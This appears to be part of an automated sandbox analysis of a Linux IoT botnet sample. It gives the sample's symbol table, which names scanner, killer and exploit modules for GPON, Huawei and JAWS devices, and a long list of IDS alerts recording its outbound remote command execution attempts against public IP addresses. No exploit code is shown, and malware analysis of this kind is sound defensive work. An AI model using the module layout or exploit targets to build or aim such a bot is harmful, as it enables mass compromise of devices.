                                  bsd_signal.symtab0x18598196FUNC<unknown>DEFAULT2
                                  calloc.symtab0x19078320FUNC<unknown>DEFAULT2
                                  calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  checksum_generic.symtab0xf83c80FUNC<unknown>DEFAULT2
                                  checksum_tcpudp.symtab0xf88c164FUNC<unknown>DEFAULT2
                                  clock.symtab0x17d3852FUNC<unknown>DEFAULT2
                                  clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  close.symtab0x1b2e0100FUNC<unknown>DEFAULT2
                                  closedir.symtab0x178dc272FUNC<unknown>DEFAULT2
                                  closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  completed.5105.symtab0x2a2f81OBJECT<unknown>DEFAULT14
                                  conn_table.symtab0x2cee04OBJECT<unknown>DEFAULT14
                                  connect.symtab0x1805c116FUNC<unknown>DEFAULT2
                                  connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  ensure_single_instance.symtab0x12bd0352FUNC<unknown>DEFAULT2
                                  environ.symtab0x2a96c4OBJECT<unknown>DEFAULT14
                                  errno.symtab0x04TLS<unknown>DEFAULT8
                                  errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  exit.symtab0x1a3b8196FUNC<unknown>DEFAULT2
                                  exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fake_time.symtab0x2a4104OBJECT<unknown>DEFAULT14
                                  fclose.symtab0x1c794816FUNC<unknown>DEFAULT2
                                  fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fcntl.symtab0x17474244FUNC<unknown>DEFAULT2
                                  fd_ctrl.symtab0x2a0f44OBJECT<unknown>DEFAULT13
                                  fd_serv.symtab0x2a0f84OBJECT<unknown>DEFAULT13
                                  fd_to_DIR.symtab0x179ec208FUNC<unknown>DEFAULT2
                                  fdopendir.symtab0x17b80176FUNC<unknown>DEFAULT2
                                  fflush_unlocked.symtab0x1d668940FUNC<unknown>DEFAULT2
                                  fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fgetc.symtab0x1d158324FUNC<unknown>DEFAULT2
                                  fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fgetc_unlocked.symtab0x1da14300FUNC<unknown>DEFAULT2
                                  fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fgets.symtab0x1d29c284FUNC<unknown>DEFAULT2
                                  fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fgets_unlocked.symtab0x1db40160FUNC<unknown>DEFAULT2
                                  fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fopen.symtab0x1cac432FUNC<unknown>DEFAULT2
                                  fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fork.symtab0x1abec972FUNC<unknown>DEFAULT2
                                  fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fork_handler_pool.symtab0x2a4241348OBJECT<unknown>DEFAULT14
                                  frame_dummy.symtab0x81340FUNC<unknown>DEFAULT2
                                  free.symtab0x197dc572FUNC<unknown>DEFAULT2
                                  free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  fstat.symtab0x1bdc8100FUNC<unknown>DEFAULT2
                                  fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  get_eit_entry.symtab0x1ef8c544FUNC<unknown>DEFAULT2
                                  getc.symtab0x1d158324FUNC<unknown>DEFAULT2
                                  getc_unlocked.symtab0x1da14300FUNC<unknown>DEFAULT2
                                  getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getdtablesize.symtab0x1becc44FUNC<unknown>DEFAULT2
                                  getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getegid.symtab0x1bef820FUNC<unknown>DEFAULT2
                                  getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  geteuid.symtab0x1bf0c20FUNC<unknown>DEFAULT2
                                  geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getgid.symtab0x1bf2020FUNC<unknown>DEFAULT2
                                  getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getpagesize.symtab0x1bf3440FUNC<unknown>DEFAULT2
                                  getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getpid.symtab0x1b05072FUNC<unknown>DEFAULT2
                                  getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getppid.symtab0x1756820FUNC<unknown>DEFAULT2
                                  getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getrlimit.symtab0x1bf5c56FUNC<unknown>DEFAULT2
                                  getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getsockname.symtab0x180d068FUNC<unknown>DEFAULT2
                                  getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getsockopt.symtab0x1811472FUNC<unknown>DEFAULT2
                                  getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  gettimeofday.symtab0x1bf9464FUNC<unknown>DEFAULT2
                                  gettimeofday.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  getuid.symtab0x1bfd420FUNC<unknown>DEFAULT2
                                  getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  gpon443.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  gpon443_fake_time.symtab0x2a3584OBJECT<unknown>DEFAULT14
                                  gpon443_kill.symtab0xf93040FUNC<unknown>DEFAULT2
                                  gpon443_ranges.symtab0x2a0b860OBJECT<unknown>DEFAULT13
                                  gpon443_rsck.symtab0x2a32c4OBJECT<unknown>DEFAULT14
                                  gpon443_scanner.symtab0xfa303004FUNC<unknown>DEFAULT2
                                  gpon443_scanner_pid.symtab0x2a3284OBJECT<unknown>DEFAULT14
                                  gpon443_scanner_rawpkt.symtab0x2a33040OBJECT<unknown>DEFAULT14
                                  gpon443_setup_connection.symtab0xf958216FUNC<unknown>DEFAULT2
                                  h_errno.symtab0x44TLS<unknown>DEFAULT8
                                  huawei.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  huaweiscanner_fake_time.symtab0x2a38c4OBJECT<unknown>DEFAULT14
                                  huaweiscanner_rsck.symtab0x2a3604OBJECT<unknown>DEFAULT14
                                  huaweiscanner_scanner_init.symtab0x106e82808FUNC<unknown>DEFAULT2
                                  huaweiscanner_scanner_kill.symtab0x105ec40FUNC<unknown>DEFAULT2
                                  huaweiscanner_scanner_pid.symtab0x2a35c4OBJECT<unknown>DEFAULT14
                                  huaweiscanner_scanner_rawpkt.symtab0x2a36440OBJECT<unknown>DEFAULT14
                                  huaweiscanner_setup_connection.symtab0x10614212FUNC<unknown>DEFAULT2
                                  index.symtab0x1e090240FUNC<unknown>DEFAULT2
                                  inet_addr.symtab0x17ef440FUNC<unknown>DEFAULT2
                                  inet_aton.symtab0x1e4a4248FUNC<unknown>DEFAULT2
                                  inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  init_static_tls.symtab0x1e59c120FUNC<unknown>DEFAULT2
                                  initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  initstate.symtab0x19cf4192FUNC<unknown>DEFAULT2
                                  initstate_r.symtab0x19fc0248FUNC<unknown>DEFAULT2
                                  ioctl.symtab0x1757c224FUNC<unknown>DEFAULT2
                                  ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  ioctl_keepalive.symtab0x12d9c576FUNC<unknown>DEFAULT2
                                  ioctl_pid.symtab0x2a3c44OBJECT<unknown>DEFAULT14
                                  isatty.symtab0x1e40436FUNC<unknown>DEFAULT2
                                  isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  jaws.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  jaws_fake_time.symtab0x2a3c04OBJECT<unknown>DEFAULT14
                                  jaws_kill.symtab0x111e040FUNC<unknown>DEFAULT2
                                  jaws_rsck.symtab0x2a3944OBJECT<unknown>DEFAULT14
                                  jaws_scanner.symtab0x112dc2680FUNC<unknown>DEFAULT2
                                  jaws_scanner_pid.symtab0x2a3904OBJECT<unknown>DEFAULT14
                                  jaws_scanner_rawpkt.symtab0x2a39840OBJECT<unknown>DEFAULT14
                                  jaws_setup_connection.symtab0x11208212FUNC<unknown>DEFAULT2
                                  kill.symtab0x1765c56FUNC<unknown>DEFAULT2
                                  kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  killer_init.symtab0x122f82240FUNC<unknown>DEFAULT2
                                  killer_kill.symtab0x11d5440FUNC<unknown>DEFAULT2
                                  killer_kill_by_port.symtab0x11d7c1404FUNC<unknown>DEFAULT2
                                  killer_pid.symtab0x2cee84OBJECT<unknown>DEFAULT14
                                  killer_realpath.symtab0x2cee44OBJECT<unknown>DEFAULT14
                                  libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  libc-lowlevellock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  libc_multiple_threads.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  listen.symtab0x1815c64FUNC<unknown>DEFAULT2
                                  listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  local_bind.4983.symtab0x2a1001OBJECT<unknown>DEFAULT13
                                  lseek64.symtab0x1ee34112FUNC<unknown>DEFAULT2
                                  main.symtab0x12fdc1952FUNC<unknown>DEFAULT2
                                  main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  malloc.symtab0x187402360FUNC<unknown>DEFAULT2
                                  malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.23118.130.210.13933544802030092 07/19/22-13:07:55.608830TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3354480192.168.2.23118.130.210.139
                                  192.168.2.23156.241.106.4945718372152835222 07/19/22-13:06:59.514191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.23156.241.106.49
                                  192.168.2.23124.156.227.13735758802030092 07/19/22-13:07:44.149430TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3575880192.168.2.23124.156.227.137
                                  192.168.2.23156.224.28.10841668372152835222 07/19/22-13:08:05.833233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166837215192.168.2.23156.224.28.108
                                  192.168.2.23156.247.18.13336720372152835222 07/19/22-13:08:47.401284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672037215192.168.2.23156.247.18.133
                                  192.168.2.23104.164.90.10443486802030092 07/19/22-13:08:48.891412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4348680192.168.2.23104.164.90.104
                                  192.168.2.2346.37.21.7854718802030092 07/19/22-13:07:00.558223TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5471880192.168.2.2346.37.21.78
                                  192.168.2.23156.244.112.11949594372152835222 07/19/22-13:08:43.529010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959437215192.168.2.23156.244.112.119
                                  192.168.2.2320.141.100.18243996802030092 07/19/22-13:07:27.736652TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4399680192.168.2.2320.141.100.182
                                  192.168.2.23114.27.144.8441064802030092 07/19/22-13:07:41.858619TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4106480192.168.2.23114.27.144.84
                                  192.168.2.2331.44.91.360572802030092 07/19/22-13:07:52.848243TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6057280192.168.2.2331.44.91.3
                                  192.168.2.2334.120.139.10148802802030092 07/19/22-13:08:31.684325TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4880280192.168.2.2334.120.139.101
                                  192.168.2.23118.41.137.14852254802030092 07/19/22-13:08:20.644005TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5225480192.168.2.23118.41.137.148
                                  192.168.2.2331.24.151.25355512802030092 07/19/22-13:08:42.690759TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5551280192.168.2.2331.24.151.253
                                  192.168.2.2318.184.82.13635388802030092 07/19/22-13:07:41.610373TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3538880192.168.2.2318.184.82.136
                                  192.168.2.2384.130.168.19150230802030092 07/19/22-13:07:08.558579TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5023080192.168.2.2384.130.168.191
                                  192.168.2.23156.234.226.4853046372152835222 07/19/22-13:08:24.350819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304637215192.168.2.23156.234.226.48
                                  192.168.2.2394.176.182.14745190802030092 07/19/22-13:08:56.518546TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4519080192.168.2.2394.176.182.147
                                  192.168.2.2369.192.162.7151150802030092 07/19/22-13:07:33.531656TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5115080192.168.2.2369.192.162.71
                                  192.168.2.23186.6.111.13346248802030092 07/19/22-13:08:26.953954TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4624880192.168.2.23186.6.111.133
                                  192.168.2.23156.226.118.16450222372152835222 07/19/22-13:08:30.111342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022237215192.168.2.23156.226.118.164
                                  192.168.2.2313.35.133.14035620802030092 07/19/22-13:08:03.886302TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3562080192.168.2.2313.35.133.140
                                  192.168.2.23156.247.30.1535624372152835222 07/19/22-13:08:24.335825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562437215192.168.2.23156.247.30.15
                                  192.168.2.23154.213.230.22846124802030092 07/19/22-13:07:33.229052TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4612480192.168.2.23154.213.230.228
                                  192.168.2.23184.86.158.8655656802030092 07/19/22-13:07:59.795285TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5565680192.168.2.23184.86.158.86
                                  192.168.2.2313.213.208.18839556802030092 07/19/22-13:07:37.409826TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3955680192.168.2.2313.213.208.188
                                  192.168.2.23104.69.0.6049404802030092 07/19/22-13:08:15.725977TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4940480192.168.2.23104.69.0.60
                                  192.168.2.23192.151.234.24057278802030092 07/19/22-13:08:56.586908TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5727880192.168.2.23192.151.234.240
                                  192.168.2.23156.226.48.14460448372152835222 07/19/22-13:08:28.843354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044837215192.168.2.23156.226.48.144
                                  192.168.2.235.251.129.20038954802030092 07/19/22-13:07:55.717013TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3895480192.168.2.235.251.129.200
                                  192.168.2.2350.17.26.20245206802030092 07/19/22-13:07:39.105519TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4520680192.168.2.2350.17.26.202
                                  192.168.2.2396.7.157.11153078802030092 07/19/22-13:08:14.260648TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5307880192.168.2.2396.7.157.111
                                  192.168.2.23151.101.116.21358644802030092 07/19/22-13:07:30.728048TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5864480192.168.2.23151.101.116.213
                                  192.168.2.2323.36.81.21446576802030092 07/19/22-13:07:37.109529TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4657680192.168.2.2323.36.81.214
                                  192.168.2.23138.201.167.17544326802030092 07/19/22-13:07:25.643844TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4432680192.168.2.23138.201.167.175
                                  192.168.2.23197.47.78.7833472802030092 07/19/22-13:08:03.721728TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3347280192.168.2.23197.47.78.78
                                  192.168.2.2381.147.98.2649404802030092 07/19/22-13:08:37.248969TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4940480192.168.2.2381.147.98.26
                                  192.168.2.23198.178.167.19758590802030092 07/19/22-13:07:22.092403TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5859080192.168.2.23198.178.167.197
                                  192.168.2.23106.248.230.8345628802030092 07/19/22-13:08:06.147760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4562880192.168.2.23106.248.230.83
                                  192.168.2.23156.241.133.6232968372152835222 07/19/22-13:07:27.792208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296837215192.168.2.23156.241.133.62
                                  192.168.2.2331.149.101.22646680802030092 07/19/22-13:08:34.851527TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4668080192.168.2.2331.149.101.226
                                  192.168.2.23184.28.146.13744142802030092 07/19/22-13:07:21.922739TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4414280192.168.2.23184.28.146.137
                                  192.168.2.23197.14.165.22353716802030092 07/19/22-13:07:37.105494TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5371680192.168.2.23197.14.165.223
                                  192.168.2.23216.115.245.17950884802030092 07/19/22-13:07:53.080025TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5088480192.168.2.23216.115.245.179
                                  192.168.2.23156.226.112.23054042372152835222 07/19/22-13:08:26.214927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404237215192.168.2.23156.226.112.230
                                  192.168.2.2378.47.166.16151538802030092 07/19/22-13:08:12.554135TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5153880192.168.2.2378.47.166.161
                                  192.168.2.23199.232.173.21256438802030092 07/19/22-13:07:37.071014TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5643880192.168.2.23199.232.173.212
                                  192.168.2.2323.32.162.18455910802030092 07/19/22-13:08:59.349046TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5591080192.168.2.2323.32.162.184
                                  192.168.2.2323.8.139.8454842802030092 07/19/22-13:08:54.126894TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5484280192.168.2.2323.8.139.84
                                  192.168.2.23181.48.125.22839268802030092 07/19/22-13:08:48.535495TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3926880192.168.2.23181.48.125.228
                                  192.168.2.23104.17.87.7634470802030092 07/19/22-13:08:41.556549TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3447080192.168.2.23104.17.87.76
                                  192.168.2.23144.208.124.25050304802030092 07/19/22-13:07:22.539422TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5030480192.168.2.23144.208.124.250
                                  192.168.2.2318.195.111.5156598802030092 07/19/22-13:08:31.667349TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5659880192.168.2.2318.195.111.51
                                  192.168.2.23213.166.224.6650566802030092 07/19/22-13:08:41.580135TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5056680192.168.2.23213.166.224.66
                                  192.168.2.2369.10.58.19759338802030092 07/19/22-13:08:14.197036TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5933880192.168.2.2369.10.58.197
                                  192.168.2.2345.139.16.7638290802030092 07/19/22-13:08:42.595768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3829080192.168.2.2345.139.16.76
                                  192.168.2.23180.70.9.6847346802030092 07/19/22-13:07:00.909625TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4734680192.168.2.23180.70.9.68
                                  192.168.2.23144.76.38.2240024802030092 07/19/22-13:07:21.780294TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4002480192.168.2.23144.76.38.22
                                  192.168.2.23217.44.36.20056710802030092 07/19/22-13:07:08.485188TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5671080192.168.2.23217.44.36.200
                                  192.168.2.23161.10.233.1734028802030092 07/19/22-13:07:27.822385TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3402880192.168.2.23161.10.233.17
                                  192.168.2.2377.136.140.840320802030092 07/19/22-13:08:52.555643TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4032080192.168.2.2377.136.140.8
                                  192.168.2.2380.15.175.21047688802030092 07/19/22-13:07:25.069564TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4768880192.168.2.2380.15.175.210
                                  192.168.2.23213.192.239.15838080802030092 07/19/22-13:07:37.055238TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3808080192.168.2.23213.192.239.158
                                  192.168.2.2334.251.156.9952512802030092 07/19/22-13:07:33.593583TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5251280192.168.2.2334.251.156.99
                                  192.168.2.2392.122.27.11540830802030092 07/19/22-13:08:20.382748TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4083080192.168.2.2392.122.27.115
                                  192.168.2.2338.26.163.2355444802030092 07/19/22-13:07:00.880942TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5544480192.168.2.2338.26.163.23
                                  192.168.2.23216.52.215.11557956802030092 07/19/22-13:08:05.728287TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5795680192.168.2.23216.52.215.115
                                  192.168.2.23193.220.127.5356268802030092 07/19/22-13:07:00.605849TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5626880192.168.2.23193.220.127.53
                                  192.168.2.23172.247.34.1457828802030092 07/19/22-13:08:56.820062TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5782880192.168.2.23172.247.34.14
                                  192.168.2.23104.103.53.1335940802030092 07/19/22-13:07:26.214079TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3594080192.168.2.23104.103.53.13
                                  192.168.2.23156.244.91.6960262372152835222 07/19/22-13:07:49.774086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026237215192.168.2.23156.244.91.69
                                  192.168.2.23156.254.49.25448104372152835222 07/19/22-13:08:16.776869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810437215192.168.2.23156.254.49.254
                                  192.168.2.23156.250.94.10955242372152835222 07/19/22-13:07:19.994562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524237215192.168.2.23156.250.94.109
                                  192.168.2.2338.90.8.18957526802030092 07/19/22-13:07:58.511934TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5752680192.168.2.2338.90.8.189
                                  192.168.2.2318.220.172.8251212802030092 07/19/22-13:07:59.823848TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5121280192.168.2.2318.220.172.82
                                  192.168.2.23194.190.42.7747628802030092 07/19/22-13:07:30.307743TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4762880192.168.2.23194.190.42.77
                                  192.168.2.23156.247.23.24950614372152835222 07/19/22-13:08:50.224476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061437215192.168.2.23156.247.23.249
                                  192.168.2.23178.63.54.7846900802030092 07/19/22-13:08:51.897530TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4690080192.168.2.23178.63.54.78
                                  192.168.2.23144.96.231.2940940802030092 07/19/22-13:08:41.842945TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4094080192.168.2.23144.96.231.29
                                  192.168.2.23156.225.135.23235426372152835222 07/19/22-13:07:46.046452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542637215192.168.2.23156.225.135.232
                                  192.168.2.23220.88.163.6953740802030092 07/19/22-13:07:51.432612TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5374080192.168.2.23220.88.163.69
                                  192.168.2.2386.69.169.18840152802030092 07/19/22-13:07:31.961948TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4015280192.168.2.2386.69.169.188
                                  192.168.2.2374.206.170.15347258802030092 07/19/22-13:07:33.351134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4725880192.168.2.2374.206.170.153
                                  192.168.2.23183.105.112.8456214802030092 07/19/22-13:08:46.032944TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5621480192.168.2.23183.105.112.84
                                  192.168.2.23104.88.158.551352802030092 07/19/22-13:07:47.209061TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5135280192.168.2.23104.88.158.5
                                  192.168.2.23110.9.137.13033112802030092 07/19/22-13:08:42.840280TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3311280192.168.2.23110.9.137.130
                                  192.168.2.23156.235.96.160060372152835222 07/19/22-13:08:20.563735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006037215192.168.2.23156.235.96.1
                                  192.168.2.2345.194.179.11734842802030092 07/19/22-13:07:59.728596TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3484280192.168.2.2345.194.179.117
                                  192.168.2.23165.192.136.14034986802030092 07/19/22-13:07:55.987412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3498680192.168.2.23165.192.136.140
                                  192.168.2.2347.244.212.9253770802030092 07/19/22-13:08:20.663875TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5377080192.168.2.2347.244.212.92
                                  192.168.2.2392.122.46.13847094802030092 07/19/22-13:08:48.375434TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4709480192.168.2.2392.122.46.138
                                  192.168.2.23184.51.50.19458316802030092 07/19/22-13:07:30.507400TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5831680192.168.2.23184.51.50.194
                                  192.168.2.2372.163.219.24454922802030092 07/19/22-13:07:33.512841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5492280192.168.2.2372.163.219.244
                                  192.168.2.2388.221.24.16059816802030092 07/19/22-13:07:46.919794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5981680192.168.2.2388.221.24.160
                                  192.168.2.23192.230.81.8443684802030092 07/19/22-13:08:23.422462TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4368480192.168.2.23192.230.81.84
                                  192.168.2.2395.216.181.15842404802030092 07/19/22-13:08:22.145927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4240480192.168.2.2395.216.181.158
                                  192.168.2.23190.55.55.2258046802030092 07/19/22-13:08:34.945965TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5804680192.168.2.23190.55.55.22
                                  192.168.2.23151.236.58.12657470802030092 07/19/22-13:07:30.219313TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5747080192.168.2.23151.236.58.126
                                  192.168.2.23192.126.206.3934428802030092 07/19/22-13:07:47.225301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3442880192.168.2.23192.126.206.39
                                  192.168.2.23145.118.2.6753276802030092 07/19/22-13:08:31.675041TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5327680192.168.2.23145.118.2.67
                                  192.168.2.2334.149.247.18948492802030092 07/19/22-13:07:13.816678TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4849280192.168.2.2334.149.247.189
                                  192.168.2.23184.87.113.5956352802030092 07/19/22-13:08:52.200952TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5635280192.168.2.23184.87.113.59
                                  192.168.2.2323.215.65.12937296802030092 07/19/22-13:08:59.355533TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3729680192.168.2.2323.215.65.129
